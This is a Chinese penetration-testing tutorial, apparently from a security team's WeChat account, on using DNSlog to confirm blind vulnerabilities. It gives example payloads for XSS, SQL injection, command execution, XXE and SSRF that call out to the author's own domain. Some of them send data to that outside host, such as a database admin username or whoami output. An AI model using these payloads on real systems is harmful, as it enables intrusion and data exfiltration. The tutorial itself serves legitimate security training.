0x01 DNSlog介绍
DNS是关联域名和IP的服务,把域名解析到对应IP上。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件。
0x02 DNSlog平台搭建
目前互联网上有很多公开的在线平台,比如ceye、dnslog.cn等。搭建DNSlog平台需要一个域名和一台VPS,有条件的同学也可以自己搭建一个,相对稳定方便,笔者用的是https://github.com/AbelChe/cola_dnslog,支持容器化一键式部署,比较方便,搭建过程参照项目说明,写得很清楚,就不再赘述了。
0x03 DNSlog应用场景
DNSlog常用于一些无回显、无法直接判断漏洞是否存在的漏洞利用,俗称“盲注”的地方,DNSlog在特定场景下,就像一双眼睛,帮助我们看到更多东西。
通常来说DNSlog有以下五种应用场景:
-
XSS攻击
-
SQL注入攻击
-
命令执行攻击
-
XXE攻击
-
SSRF攻击
一、XSS攻击应用场景
不知道插在哪了怎么办?插了没反应怎么办?前台想要打后台管理员怎么办?在测试的过程中,经常会遇到这类场景,通过dnslog可以方便的对这些问题进行检测,比如插入一下代码
<img src=//123.xss.terrasec.cn/666.jpg>成功触发后便可在dnslog上查看到请求信息,当然在xss平台能够更有效的进行利用。
二、SQL注入攻击应用场景
在sql盲注的时候,可以利用dnslog来提高我们注入的效率,通过数据库自带的一些函数来向我们的服务器发送请求,比如mysql中的load_file函数、sqlserver的master..xp_dirtree等。
在mysql中执行以下语句便可以发送到我们服务器的请求,进而可以通过dnslog来获取数据库中的数据
select load_file(concat('\\',(select username from admin),'.sql.terrasec.cn\abc'))
具体利用可以参考往期文章【渗透测试】MSSQL盲注实战
三、命令执行攻击应用场景
在某些命令执行漏洞的执行无回显的时候,我们可以依托dnslog来帮助我们判断命令是否执行成功,像之前比较热门的log4j2、shrio等的漏洞检测都是基于dnslog来进行判断。
执行以下代码便可通过dnslog查看到请求的信息。
ping `whoami`.rce.terrasec.cn
四、XXE攻击应用场景
在面对无回显类型的xxe漏洞时,往往需要使用DNSLog来协助检测,同样也是通过调用系统来往我们的服务器上面发送请求,成功执行后可在我们的服务器上面查看到相应的信息。
在xxe漏洞中发送以下请求便可使目标服务器向我们的服务器发送一个http的请求。
<!ENTITY terra SYSTEM "http://xxe.terrasec.cn">]>
五、SSRF攻击应用场景
DNSlog在无回显的SSRF漏洞中应该是使用最频繁的,由于SSRF漏洞的特性,我们可以操作发送各类协议的请求,在进行漏洞检测的时候使用DNSlog来判断可以很快速得到结果,最常用的就是发送http协议请求。比如下面的代码
?a=http://ssrf.terrasec.cn/1.jpg0x04 结语
DNSlog是一种概念,借助第三方来进行漏洞验证或者数据获取,并不是非要搭建某个DNSlog平台才能使用,在我们实际使用中要理解概念灵活运用,比如在内网不出网的环境下,无法使用互联网的DNSlog平台,那么可以本地开启http服务或者监听一个端口,同样可以达到DNSlog的效果。
针对上述漏洞的DNSlog应用,可以在bWAPP靶场中进行练习以加深理解,下载地址:http://www.itsecgames.com/bugs.htm
0x05 免责声明
本文仅限于技术研究学习,切勿将文中技术细节用作非法用途,如有违者后果自负。
关于我们
“TERRA星环”安全团队正式成立于2020年,是贵州泰若数字科技有限公司旗下以互联网攻防技术研究为目标的安全团队。团队核心成员长期从事渗透测试、代码审计、应急响应等安服工作,多次参与国家、省级攻防演练行动,具备丰富的安服及攻防对抗经验。
团队专注于漏洞挖掘、漏洞研究、红蓝对抗、CTF夺旗、溯源取证、威胁情报、代码审计、逆向分析等研究。对外提供安全评估、安全培训、安全咨询、安全集成、应急响应等服务。
原文始发于微信公众号(TERRA星环安全团队):渗透测试|你是我的眼:DNSlog应用场景
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论